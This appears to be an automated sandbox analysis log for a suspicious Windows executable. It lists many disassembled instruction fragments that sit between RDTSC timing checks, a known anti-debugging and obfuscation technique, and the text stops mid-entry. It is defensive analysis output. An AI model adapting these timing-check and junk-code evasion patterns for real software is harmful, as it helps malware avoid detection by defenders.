            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 540C81 second address: 540CF3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA4C9084156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA4C9084161h 0x0000000f popad 0x00000010 add dword ptr [esp], 17A97FB0h 0x00000017 call 00007FA4C908415Dh 0x0000001c mov edx, dword ptr [ebp+122D38EEh] 0x00000022 pop edi 0x00000023 push 00000003h 0x00000025 jnl 00007FA4C908415Ch 0x0000002b push 00000000h 0x0000002d jmp 00007FA4C9084167h 0x00000032 push 00000003h 0x00000034 mov di, dx 0x00000037 push A688C40Bh 0x0000003c push eax 0x0000003d push edx 0x0000003e jp 00007FA4C908415Ch 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 540CF3 second address: 540CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 540CF7 second address: 540CFC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 540CFC second address: 540D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 19773BF5h 0x0000000e lea ebx, dword ptr [ebp+12456872h] 0x00000014 sub dword ptr [ebp+122D2FAFh], ebx 0x0000001a xchg eax, ebx 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 540D1C second address: 540D3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084165h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 540D3D second address: 540D41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 540D41 second address: 540D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 56313D second address: 563156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C9026353h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 524A40 second address: 524A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5613E4 second address: 5613FE instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA4C902635Ch 0x00000008 jmp 00007FA4C9026350h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5617A1 second address: 5617AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007FA4C9084156h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5617AD second address: 5617C1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA4C9026346h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FA4C9026346h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 561ABD second address: 561AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 561AC1 second address: 561AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 561AC7 second address: 561AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 561AD0 second address: 561AD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 561C58 second address: 561C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 561C5C second address: 561C6F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA4C9026346h 0x00000008 jg 00007FA4C9026346h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 561D90 second address: 561DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C908415Ch 0x00000009 js 00007FA4C9084156h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 561DAB second address: 561DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 561DAF second address: 561DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 je 00007FA4C9084191h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 561DC2 second address: 561DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 561DC6 second address: 561DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 561DCA second address: 561DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 561DD6 second address: 561DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 561DDA second address: 561DF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026353h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 562092 second address: 562096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 562096 second address: 5620B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026351h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5620B1 second address: 5620D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FA4C9084156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FA4C908415Dh 0x00000016 jnp 00007FA4C9084156h 0x0000001c popad 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5620D6 second address: 5620DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5623C1 second address: 5623CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA4C9084156h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5623CB second address: 5623E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026355h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5623E4 second address: 562408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA4C908415Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FA4C9084158h 0x00000013 push esi 0x00000014 pop esi 0x00000015 jc 00007FA4C908415Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 562408 second address: 56240E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 562D5E second address: 562D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 562D64 second address: 562D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 562D68 second address: 562D6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 56C000 second address: 56C00D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 js 00007FA4C9026348h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 56C00D second address: 56C012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 56C012 second address: 56C025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA4C9026346h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 56C025 second address: 56C02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 56C02B second address: 56C046 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026354h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 56C046 second address: 56C04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 56C04E second address: 56C055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 570647 second address: 57064D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 57064D second address: 570651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 57091F second address: 570923 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 570923 second address: 570929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 570ABD second address: 570AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 570AC1 second address: 570ACB instructions: 0x00000000 rdtsc 0x00000002 je 00007FA4C9026346h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 571467 second address: 57146D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 57146D second address: 571471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 571471 second address: 571495 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084168h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5716DB second address: 5716DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5718D1 second address: 5718D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 571FD3 second address: 571FFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026351h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FA4C9026352h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 571FFF second address: 572008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 572526 second address: 57252C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 57252C second address: 572530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 57359F second address: 5735A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5735A5 second address: 5735B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FA4C9084156h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5735B2 second address: 5735B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 574755 second address: 57475A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 57475A second address: 5747F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FA4C902634Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push esi 0x0000000f pushad 0x00000010 jmp 00007FA4C9026359h 0x00000015 jmp 00007FA4C9026351h 0x0000001a popad 0x0000001b pop esi 0x0000001c nop 0x0000001d jo 00007FA4C902635Eh 0x00000023 jmp 00007FA4C9026358h 0x00000028 push 00000000h 0x0000002a mov edi, dword ptr [ebp+122D38CEh] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007FA4C9026348h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000017h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c movzx esi, ax 0x0000004f push eax 0x00000050 jbe 00007FA4C9026358h 0x00000056 push eax 0x00000057 push edx 0x00000058 jno 00007FA4C9026346h 0x0000005e rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5747F9 second address: 5747FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 57683F second address: 576866 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA4C902634Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FA4C9026352h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5772E5 second address: 5772E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 57DAD3 second address: 57DAD9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 57EB11 second address: 57EB24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 57F8B5 second address: 57F8B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 57EB24 second address: 57EB29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 57F8B9 second address: 57F94C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b nop 0x0000000c mov bh, 8Ah 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FA4C9026348h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a and ebx, dword ptr [ebp+122D1968h] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007FA4C9026348h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 0000001Bh 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c mov dword ptr [ebp+122D29E2h], edx 0x00000052 push eax 0x00000053 pushad 0x00000054 jmp 00007FA4C9026358h 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FA4C9026352h 0x00000060 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 57FBA4 second address: 57FBA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5846C7 second address: 5846CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 583867 second address: 583871 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA4C9084156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5846CD second address: 5846D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 583871 second address: 583876 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 583876 second address: 583889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b jnc 00007FA4C902634Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 583889 second address: 5838DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 nop 0x00000006 push dword ptr fs:[00000000h] 0x0000000d mov ebx, edi 0x0000000f mov dword ptr fs:[00000000h], esp 0x00000016 mov dword ptr [ebp+12454E29h], edx 0x0000001c mov eax, dword ptr [ebp+122D06E5h] 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007FA4C9084158h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 0000001Bh 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c push FFFFFFFFh 0x0000003e sbb bl, 00000021h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push ecx 0x00000047 pop ecx 0x00000048 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 585789 second address: 5857AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C9026358h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5838DA second address: 5838E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5857AA second address: 5857B8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5857B8 second address: 5857BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5857BC second address: 5857C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5857C0 second address: 5857C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5876D1 second address: 587749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FA4C9026348h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 mov ebx, dword ptr [ebp+122D382Eh] 0x00000029 mov ebx, dword ptr [ebp+122D1BC2h] 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007FA4C9026348h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 0000001Ah 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b push 